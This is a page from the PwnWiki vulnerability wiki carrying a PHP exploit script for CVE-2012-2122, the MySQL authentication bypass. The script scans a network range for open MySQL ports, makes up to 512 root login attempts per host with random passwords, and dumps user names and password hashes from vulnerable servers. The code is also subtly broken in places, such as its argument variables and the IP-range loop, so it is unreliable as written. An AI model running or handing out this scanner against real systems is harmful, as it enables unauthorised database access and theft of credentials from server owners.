免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
Usage
php scanner.php 10.0.0.1/18 block in cidr notation
Requirements:
php5-cli
POC
<?php
/*
l0l get at me ;) - Avinza
CVE-2012-2122 scanner
*/
error_reporting(0);
$me = @$argv0;
if(!isset($argv1) || !strpos($argv1,"/")) {
printf("php %s %s \n", "{$me}","10.0.0.1/18 block in cidr notation");
/* clean this shit up */
exit;
}
list($start,$mask) = explode("/",$argv1);
$block=cidr_gen($start,$mask,TRUE);
//echo print_r($block,1)."\n";
foreach ($block as $host) {
$open = fsockopen($host, 3306, $errno, $errstr, 30); /* because im lame */
$p = uniqid(mt_rand());
$i = 0;
if($open){
printf("#%d accepts connections.\n", $host);
do {
$link = @mysql_connect($host, 'root', $p);
if($link) {
printf("Host %s is vulnerable. Proceeding With Dump\n", $host);
$sql = "SELECT user,password from mysql.user";
/* dump hashes (replace with whatever query */
mysql_select_db('information_schema');
$results = mysql_query($sql);
if($results) {
printf(" %s ","\n");
while($row = mysql_fetch_assoc($results)) {
var_dump($row);
printf(" %s ","\n");
}
} else {
printf(" %s ", "Host Appears to Be Vuln But Query Failed: {$sql}: " . mysql_error());
}
}
//printf("#%d Attempts.\n", $i);
$i++;
} while($i < 512);
}
}
function cidr_gen($ip,$bitmask=24,$return_array=FALSE) {
$corr=(pow(2,32)-1)-(pow(2,32-$bitmask)-1);
$first=ip2long($ip) & ($corr);
$length=pow(2,32-$bitmask)-1;
if (!$return_array) {
return array(
'first'=>$first,
'size'=>$length+1,
'last'=>$first+$length,
'first_ip'=>long2ip($first),
'last_ip'=>long2ip($first+$length)
);
}
$ips=array();
for ($i=0;$i<=$length;$i++) {
$ips=long2ip($first+$i);
}
return $ips;
}
?>
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
